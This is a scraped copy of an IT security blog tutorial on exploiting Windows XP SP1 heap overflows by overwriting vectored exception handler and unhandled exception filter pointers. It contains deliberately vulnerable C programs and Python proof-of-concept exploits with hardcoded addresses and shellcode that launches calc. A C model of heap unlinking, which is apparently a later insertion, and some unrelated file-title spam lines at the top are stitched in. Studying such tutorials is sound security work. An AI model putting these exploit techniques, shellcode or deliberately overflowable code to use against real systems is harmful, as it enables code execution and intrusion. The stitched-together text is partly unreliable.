 
prestige-tranquil details of house and rooms
prestige-tranquil details of house and roomsprestige-tranquil details of house and rooms
prestige-tranquil details of house and rooms
 
Lublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdfLublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdf
 
PSP3 employability assessment form .docx
PSP3 employability assessment form .docxPSP3 employability assessment form .docx
PSP3 employability assessment form .docx
 

Heap overflows for humans – 101

mr_me's IT security blog - 1 / 12 - 10.01.2011
The heap is an area of storage where a process can store data. Each process dynamically allocates and deallocates heap memory based on the requirements of the application, and that memory is globally accessible within the process. It is important to point out that the stack grows towards 0x00000000 and yet the heap grows towards 0xFFFFFFFF. This means that if a process was to call HeapAlloc() twice, the second call would return a pointer that is higher than the first. Therefore any overflow of the first block will overflow into the second block.

Every heap, whether it is the default process heap or one the process allocated dynamically, contains multiple data structures. One of those data structures is an array of 128 LIST_ENTRY structures that keeps track of free blocks. This is known as the FreeLists. Each list entry holds two pointers, and the beginning of this array can be found at offset 0x178 bytes into the heap structure.

When a heap is created, two pointers which point to the first free block of memory available for allocation are set at FreeLists[0]. At the address that these two pointers point to (the beginning of the first available block) are two pointers that point back to FreeLists[0]. Let that sink in, and then think about this. Assuming we have a heap with a base address of 0x00650000 and the first available block is located at 0x00650688, then we can assume the following four addresses:

1. At address 0x00650178 (FreeList[0].Flink) is a pointer with the value 0x00650688 (our first free block)
2. At address 0x0065017c (FreeList[0].Blink) is a pointer with the value 0x00650688 (our first free block)
3. At address 0x00650688 (our first free block) is a pointer with the value 0x00650178 (FreeList[0])
4. At address 0x0065068c (our first free block) is a pointer with the value 0x00650178 (FreeList[0])

When an allocation occurs, the FreeList[0].Flink and FreeList[0].Blink pointers are updated to point to the next free block that will be allocated. Furthermore, the two pointers that point back to the FreeList are moved to the end of the newly allocated block. On every allocation or free these pointers are updated, so the free blocks are tracked in a doubly linked list. When a heap buffer is overflowed into the heap control data, the updating of these pointers allows the arbitrary DWORD overwrite. An attacker at this point has the opportunity to modify program control data such as function pointers and thus gain control of the process's path of execution.

Exploiting Heap Overflows using Vectored Exception Handling

First, let's begin with our heap-veh.c code:
#include <windows.h>
#include <stdio.h>
#include <string.h>

DWORD MyExceptionHandler(void);
int foo(char *buf);

int main(int argc, char *argv[])
{
    HMODULE l;
    l = LoadLibrary("msvcrt.dll");
    l = LoadLibrary("netapi32.dll");
    printf("\n\nHeapoverflow program.\n");
    if(argc != 2)
        return printf("ARGS!");
    foo(argv[1]);
    return 0;
}

DWORD MyExceptionHandler(void)
{
    printf("In exception handler....");
    ExitProcess(1);
    return 0;
}

int foo(char *buf)
{
    HLOCAL h1 = 0, h2 = 0;
    HANDLE hp;

    __try{
        // Private heap: 0x1000 bytes committed, 0x10000 reserved
        hp = HeapCreate(0,0x1000,0x10000);
        if(!hp){
            return printf("Failed to create heap.\n");
        }
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);

        printf("HEAP: %.8X %.8X\n",h1,&h1);

        // Heap Overflow occurs here: argv[1] is copied with no length check
        strcpy(h1,buf);

        // This second call to HeapAlloc() is when we gain control
        h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
        printf("hello");
    }
    __except(MyExceptionHandler())
    {
        printf("oops...");
    }
    return 0;
}
From the heap-veh.c code, we can see that there will be exception handling due to the __try block statement. Begin by compiling the code with your favourite compiler under Windows XP SP1. Run the application on the command line and notice how, when it is given over 260 bytes as an argv, the exception handler kicks in. Now of course when we run this in the debugger, we gain control of the second allocation (because freelist[0] is being updated with our attack string from the first allocation). Look:

MOV DWORD PTR DS:[ECX],EAX
MOV DWORD PTR DS:[EAX+4],ECX

These instructions are saying "Make the current value of EAX the pointer of ECX and make the current value of ECX the value of EAX at the next 4 bytes". From this we know we are unlinking (freeing) the first allocated memory block. So essentially it means:

1. EAX (what we write): Blink
2. ECX (location of where to write): Flink

So what is vectored exception handling? Vectored exception handling was introduced when Windows XP was first released, and it stores its exception registration structures on the heap, unlike traditional frame-based exception handling such as SEH, which stores its structures on the stack. This type of exception handler is called before any frame-based exception handling. The following structure depicts the layout:

struct _VECTORED_EXCEPTION_NODE
{
    DWORD m_pNextNode;
    DWORD m_pPreviousNode;
    PVOID m_pfnVectoredHandler;
};

All that you need to know is that m_pNextNode points to the next _VECTORED_EXCEPTION_NODE structure, therefore we must overwrite the pointer to _VECTORED_EXCEPTION_NODE (m_pNextNode) with our fake pointer. But what do we overwrite it with? Let's take a look at the code that is responsible for dispatching the _VECTORED_EXCEPTION_NODE:

77F7F49E 8B35 1032FC77    MOV ESI,DWORD PTR DS:[77FC3210]
77F7F4A4 EB 0E            JMP SHORT ntdll.77F7F4B4
77F7F4A6 8D45 F8          LEA EAX,DWORD PTR SS:[EBP-8]
77F7F4A9 50               PUSH EAX
77F7F4AA FF56 08          CALL DWORD PTR DS:[ESI+8]

So we MOV the pointer to _VECTORED_EXCEPTION_NODE into ESI and shortly after we call [ESI+8]. If we set the next pointer of _VECTORED_EXCEPTION_NODE to a pointer to our shellcode minus 0x08, then we should land very neatly into our buffer. Where do we find a pointer to our shellcode? Well, there is one on the stack :0) We can see our pointer to our shellcode on the stack. Ok, no stress, let's use this hardcoded value 0x0012ff40. Except remember the call [esi+8]? Well, let's make sure we hit right on target for our shellcode, so 0x0012ff40 - 0x08 = 0x0012ff38. Excellent, so ECX is going to be set to 0x0012ff38.

How do we find m_pNextNode (the pointer to the next _VECTORED_EXCEPTION_NODE)? Well, in Olly (or Immunity Debugger) we can pass our exception so far using shift+f7 and try to continue through the code. The code will set up for the call to the first _VECTORED_EXCEPTION_NODE and as such will reveal the pointer at:

77F60C2C BF 1032FC77      MOV EDI,ntdll.77FC3210
77F60C31 393D 1032FC77    CMP DWORD PTR DS:[77FC3210],EDI
77F60C37 0F85 48E80100    JNZ ntdll.77F7F485

You can see that the code is moving the m_pNextNode (our pointer that we need) into EDI. Excellent, let's set EAX to that value.
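The write-4 primitive described above (the two MOV instructions, and the Flink/Blink bookkeeping from the FreeLists section) modelled in C, as an added example that is not part of mr_me's post or its PoC code. Memory is a flat simulated array, so it builds and runs anywhere: 0x178 for FreeLists[0] and 0x688 for the first free block are the post's own offsets, while 0x800 (the next free block), 0xC00 (the value to be written) and 0xF00 (the global pointer slot to be overwritten, standing in for something like the VEH list head) are assumptions of the model. Beside the unchecked SP1 style unlink it includes the "safe unlinking" check that later Windows heap managers added, which is why this exact technique stops working on newer service packs:

```c
/* Added example: a flat-memory model of the XP SP1 FreeList unlink that
 * heap-veh.exe / heap-uef.exe trigger on their second HeapAlloc(), beside the
 * "safe unlinking" check that later heap managers added. Nothing here touches a
 * real Windows heap; every address is an offset into the simulated array. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE   0x1000u
#define FREELIST0  0x178u   /* FreeLists[0] sits 0x178 bytes into the heap (from the post) */
#define BLOCK_A    0x688u   /* first free block, the offset the post uses */
#define BLOCK_B    0x800u   /* next free block (assumed offset for the model) */
#define TARGET     0xF00u   /* simulated global pointer slot, e.g. an exception-handler list head */
#define VALUE      0xC00u   /* simulated address an attacker would want stored in TARGET */

static uint8_t mem[MEM_SIZE];   /* the whole simulated process memory */

static uint32_t rd32(uint32_t a) { uint32_t v; memcpy(&v, &mem[a], 4); return v; }
static void     wr32(uint32_t a, uint32_t v) { memcpy(&mem[a], &v, 4); }

/* Circular doubly linked list: FREELIST0 <-> BLOCK_A <-> BLOCK_B <-> FREELIST0.
 * Each entry is {Flink at +0, Blink at +4}, like LIST_ENTRY. */
static void build_freelist(void) {
    memset(mem, 0, sizeof mem);
    wr32(FREELIST0, BLOCK_A);   wr32(FREELIST0 + 4, BLOCK_B);
    wr32(BLOCK_A,   BLOCK_B);   wr32(BLOCK_A + 4,   FREELIST0);
    wr32(BLOCK_B,   FREELIST0); wr32(BLOCK_B + 4,   BLOCK_A);
}

/* SP1 style unlink: the two pointer writes the post shows as
 *   MOV DWORD PTR DS:[ECX],EAX  /  MOV DWORD PTR DS:[EAX+4],ECX
 * with no check that the entry is still a consistent list member. */
static void unlink_unchecked(uint32_t entry) {
    uint32_t flink = rd32(entry), blink = rd32(entry + 4);
    wr32(blink, flink);       /* Blink->Flink = Flink */
    wr32(flink + 4, blink);   /* Flink->Blink = Blink */
}

/* Safe unlinking: only proceed if both neighbours still point back at entry.
 * Returns 1 if unlinked, 0 if the list was found to be corrupted. */
static int unlink_safe(uint32_t entry) {
    uint32_t flink = rd32(entry), blink = rd32(entry + 4);
    if (flink > MEM_SIZE - 8 || blink > MEM_SIZE - 8) return 0;  /* keep the model in bounds */
    if (rd32(flink + 4) != entry || rd32(blink) != entry) return 0;
    wr32(blink, flink);
    wr32(flink + 4, blink);
    return 1;
}

/* The strcpy() overflow from the post, in the model: the copy runs past the
 * allocated data and replaces the two list pointers of the next free block. */
static void overflow_into_block_b(void) {
    wr32(BLOCK_B,     VALUE);    /* fake Flink: the value that will be written   */
    wr32(BLOCK_B + 4, TARGET);   /* fake Blink: the address it will be written to */
}

/* Consistent list: the safe unlink accepts BLOCK_A and the head now links to BLOCK_B. */
static int demo_legit(void) {
    build_freelist();
    return unlink_safe(BLOCK_A) && rd32(FREELIST0) == BLOCK_B && rd32(BLOCK_B + 4) == FREELIST0;
}

/* Corrupted list, unchecked unlink: returns what now sits in TARGET (the write-4). */
static uint32_t demo_corrupt_unchecked(void) {
    build_freelist();
    overflow_into_block_b();
    unlink_unchecked(BLOCK_B);
    return rd32(TARGET);
}

/* Corrupted list, safe unlink: returns the unlink result and reports TARGET afterwards. */
static int demo_corrupt_safe(uint32_t *target_after) {
    int ok;
    build_freelist();
    overflow_into_block_b();
    ok = unlink_safe(BLOCK_B);
    *target_after = rd32(TARGET);
    return ok;
}

int main(void) {
    uint32_t t;
    printf("consistent list, safe unlink accepted: %d\n", demo_legit());
    printf("corrupt list, unchecked unlink: TARGET = 0x%08x (VALUE = 0x%08x)\n",
           (unsigned)demo_corrupt_unchecked(), (unsigned)VALUE);
    printf("corrupt list, safe unlink accepted: %d, TARGET = 0x%08x\n",
           demo_corrupt_safe(&t), (unsigned)t);
    return 0;
}
```

The unchecked path is the whole story of this post: whatever two dwords the overflow leaves in the next free block's header become "where" and "what" for a 4-byte write on the next HeapAlloc(). The second write (back into VALUE+4) is also why the post needs the write target and the shellcode pointer to sit in writable memory. The safe variant is the check to look for when you are deciding whether a given allocator is still exploitable this way.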
So as it stands, we have the following values set:

ECX = 0x77fc3210
EAX = 0x0012ff38

But of course we need our offsets to EAX and ECX, so we just create an MSF pattern and feed it into the application. Here is a quick reminder for your viewing pleasure:

Step 1 – Create msf pattern.
Step 2 – Feed it to the target application.
Step 3 – Calculate offsets by turning on anti-debugging and triggering the exception.

Ok so here is a skeleton PoC exploit:

# _vectored_exception_node
import os

exploit = ("\xcc" * 272)
# ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04
# due to second MOV writes to EAX+4 == 0x77fc320c
exploit += ("\x0c\x32\xfc\x77") # ECX
# EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38
exploit += ("\x38\xff\x12") # EAX - we don't need the null byte
os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-veh.exe ' + exploit)

Now at this stage we cannot have shellcode after our ECX instruction because it contains a null byte; you may remember this from my previous tutorial, Debugging an SEH 0day. This may not always be the case, as in this example we are using a strcpy to store our buffer in the heap. Ok so at this point we hit our software breakpoints at "\xcc" and can simply replace them with some shellcode. The shellcode must not be more than 272 bytes as this is the only spot to place our shellcode.

# _vectored_exception_node
import os
import win32api

calc = ("\xda\xcb\x2b\xc9\xd9\x74\x24\xf4\x58\xb1\x32\xbb\xfa\xcd" +
        "\x2d\x4a\x83\xe8\xfc\x31\x58\x14\x03\x58\xee\x2f\xd8\xb6" +
        "\xe6\x39\x23\x47\xf6\x59\xad\xa2\xc7\x4b\xc9\xa7\x75\x5c" +
        "\x99\xea\x75\x17\xcf\x1e\x0e\x55\xd8\x11\xa7\xd0\x3e\x1f" +
        "\x38\xd5\xfe\xf3\xfa\x77\x83\x09\x2e\x58\xba\xc1\x23\x99" +
        "\xfb\x3c\xcb\xcb\x54\x4a\x79\xfc\xd1\x0e\x41\xfd\x35\x05" +
        "\xf9\x85\x30\xda\x8d\x3f\x3a\x0b\x3d\x4b\x74\xb3\x36\x13" +
        "\xa5\xc2\x9b\x47\x99\x8d\x90\xbc\x69\x0c\x70\x8d\x92\x3e" +
        "\xbc\x42\xad\x8e\x31\x9a\xe9\x29\xa9\xe9\x01\x4a\x54\xea" +
        "\xd1\x30\x82\x7f\xc4\x93\x41\x27\x2c\x25\x86\xbe\xa7\x29" +
        "\x63\xb4\xe0\x2d\x72\x19\x9b\x4a\xff\x9c\x4c\xdb\xbb\xba" +
        "\x48\x87\x18\xa2\xc9\x6d\xcf\xdb\x0a\xc9\xb0\x79\x40\xf8" +
        "\xa5\xf8\x0b\x97\x38\x88\x31\xde\x3a\x92\x39\x71\x52\xa3" +
        "\xb2\x1e\x25\x3c\x11\x5b\xd9\x76\x38\xca\x71\xdf\xa8\x4e" +
        "\x1c\xe0\x06\x8c\x18\x63\xa3\x6d\xdf\x7b\xc6\x68\xa4\x3b" +
        "\x3a\x01\xb5\xa9\x3c\xb6\xb6\xfb\x5e\x59\x24\x67\xa1\x93")

exploit = ("\x90" * 5)
exploit += (calc)
exploit += ("\xcc" * (272-len(exploit)))
# ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04
# due to second MOV writes to EAX+4 == 0x77fc320c
exploit += ("\x0c\x32\xfc\x77") # ECX
# EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38
exploit += ("\x38\xff\x12") # EAX - we don't need the null byte
win32api.WinExec(('heap-veh.exe %s') % exploit, 1)

Exploiting Heap Overflows using the Unhandled Exception Filter

The Unhandled Exception Filter is the last exception handler to be called before an application closes. It is responsible for dispatching the very common message "An unhandled error occurred" when an application suddenly crashes. Up until this point, we have gotten to the stage of controlling EAX and ECX and knowing the offset location to both registers:

import os
exploit = ("\xcc" * 272)
exploit += ("\x41" * 4) # ECX
exploit += ("\x42" * 4) # EAX
exploit += ("\xcc" * 272)
os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-uef.exe ' + exploit)

Unlike the previous example, our heap-uef.c file contains no traces of a custom exception handler. This means we are going to exploit the application using Microsoft's default Unhandled Exception Filter. Below is the heap-uef.c file:

#include <stdio.h>
#include <string.h>
#include <windows.h>

int foo(char *buf);

int main(int argc, char *argv[])
{
    HMODULE l;
    l = LoadLibrary("msvcrt.dll");
    l = LoadLibrary("netapi32.dll");
    printf("\n\nHeapoverflow program.\n");
    if(argc != 2)
        return printf("ARGS!");
    foo(argv[1]);
    return 0;
}

int foo(char *buf)
{
    HLOCAL h1 = 0, h2 = 0;
    HANDLE hp;

    // Private heap: 0x1000 bytes committed, 0x10000 reserved
    hp = HeapCreate(0,0x1000,0x10000);
    if(!hp)
        return printf("Failed to create heap.\n");
    h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
    printf("HEAP: %.8X %.8X\n",h1,&h1);

    // Heap Overflow occurs here: argv[1] is copied with no length check
    strcpy(h1,buf);

    // We gain control of this second call to HeapAlloc
    h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
    printf("hello");
    return 0;
}

When debugging this type of overflow, it's important to turn anti-debugging on within Olly or Immunity Debugger so that our Exception Filter is called and the offsets are at the correct location.

Ok so first of all, we must find where we are going to write our dword to. This would be the pointer to the Unhandled Exception Filter. This can be found by looking at the code at SetUnhandledExceptionFilter(). It can be seen that a MOV instruction uses a pointer to UnhandledExceptionFilter (0x77ed73b4):

So at this point, we can safely say that ECX will contain the value 0x77c3bbad. But now what are we going to write? Let's take a look at what happens when the UnhandledExceptionFilter is called:

77E93114 A1 B473ED77      MOV EAX,DWORD PTR DS:[77ED73B4]
77E93119 3BC6             CMP EAX,ESI
77E9311B 74 15            JE SHORT kernel32.77E93132
77E9311D 57               PUSH EDI
77E9311E FFD0             CALL EAX

Basically, the pointer to UnhandledExceptionFilter() is loaded into EAX, then a PUSH EDI and a CALL EAX execute. Similar to Vectored Exception Handling (except the complete opposite), we can overwrite the pointer's value. This pointer will then point to our shellcode, or to an instruction that will get us back to our shellcode. If we take a look at EDI, we will notice a pointer after 0x78 bytes to the bottom of our payload (8 bytes off the bottom of our payload). So if we simply call this pointer, we will be executing our shellcode. Therefore we need an instruction in EAX such as:

call dword ptr ds:[edi+74]

This instruction is easily found in many MS modules under XP SP1. So then let's fill in these values into our PoC and see where we land:

import os
exploit = ("\xcc" * 272)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\xcc" * 272)
os.system('"C:\\Documents and Settings\\Steve\\Desktop\\odbg110\\OLLYDBG.EXE" heap-uef.exe ' + exploit)

Of course we simply calculate the offset to this part of the shellcode, insert our JMP instruction and insert our shellcode:

import os

calc = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
        "\x44\x80\xc2\x77" # address to WinExec()
        "\xFF\xD1\x90\x90")

exploit = ("\x44" * 264)
exploit += "\xeb\x14" # our JMP (over the junk and into nops)
exploit += ("\x44" * 6)
exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
exploit += ("\x90" * 21)
exploit += calc

os.system('heap-uef.exe ' + exploit)

Boom!
Conclusion:

We have demonstrated two techniques for exploiting unlink() in its most primitive form under Windows XP SP1. Other techniques can also apply in the same situation, such as RtlEnterCriticalSection or TEB Exception Handler exploitation. Following on from here we will present exploiting unlink() (HeapAlloc/HeapFree) under Windows XP SP2 and SP3 and bypassing the Windows heap protections.

PoC's:

http://www.exploit-db.com/exploits/12240/
http://www.exploit-db.com/exploits/15957/

References:

1. The Shellcoder's Handbook (Chris Anley, John Heasman, FX, Gerardo Richarte)
2. David Litchfield (http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt)

This entry was posted on Sunday, October 24th, 2010 at 2:30 pm and is filed under exploit development. You can follow any responses to this entry through the Comments (RSS) feed. You can leave a response, or trackback from your own site.